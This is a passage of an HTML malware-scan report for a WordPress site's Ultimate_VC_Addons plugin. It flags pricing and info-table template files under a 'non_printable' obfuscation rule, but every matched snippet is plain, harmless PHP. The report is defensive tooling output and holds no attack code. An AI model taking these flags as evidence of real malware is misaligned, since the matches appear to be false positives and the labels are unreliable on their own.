</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_407").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/templates/pricing/pricing-design05.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 17.31 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:24</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 4</span><br><table id="file_408" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 18</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ult_price_generate_design05</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 380</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 9</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'ult_price_generate_design05' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_408").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/templates/pricing/pricing-design03.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 17.22 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:24</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 4</span><br><table id="file_409" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 18</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ult_price_generate_design03</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 378</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 9</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'ult_price_generate_design03' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_409").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/templates/pricing/pricing-design02.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 17.22 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:24</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 4</span><br><table id="file_410" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 18</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ult_price_generate_design02</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 376</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 9</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'ult_price_generate_design02' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_410").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/templates/pricing/pricing-design01.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 17.27 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:24</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 4</span><br><table id="file_411" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 18</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ult_price_generate_design01</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 380</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 9</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'ult_price_generate_design01' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_411").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/templates/pricing/pricing-design06.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 17.55 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:24</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 4</span><br><table id="file_412" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 18</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ult_price_generate_design06</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 384</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 9</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'ult_price_generate_design06' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_412").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/templates/pricing/pricing-design04.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 17.27 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:24</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 4</span><br><table id="file_413" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 18</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ult_price_generate_design04</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 381</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 9</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'ult_price_generate_design04' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_413").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/templates/info-tables/info-table-design01.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 15.08 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:24</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 4</span><br><table id="file_414" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 18</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ult_info_table_generate_design01</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 319</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 9</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'ult_info_table_generate_design01' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_414").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/templates/info-tables/info-table-design04.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 15.53 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:24</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 4</span><br><table id="file_415" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 18</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ult_info_table_generate_design04</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 329</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 9</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'ult_info_table_generate_design04' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_415").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/templates/info-tables/info-table-design03.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 15.18 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:24</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 4</span><br><table id="file_416" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 18</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ult_info_table_generate_design03</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 319</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 9</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'ult_info_table_generate_design03' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_416").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/templates/info-tables/info-table-design05.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 15.34 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:24</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 4</span><br><table id="file_417" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 18</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ult_info_table_generate_design05</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 319</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 9</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'ult_info_table_generate_design05' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_417").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/templates/info-tables/info-table-design06.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 15.20 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:24</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 4</span><br><table id="file_418" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 18</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ult_info_table_generate_design06</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 320</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 9</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
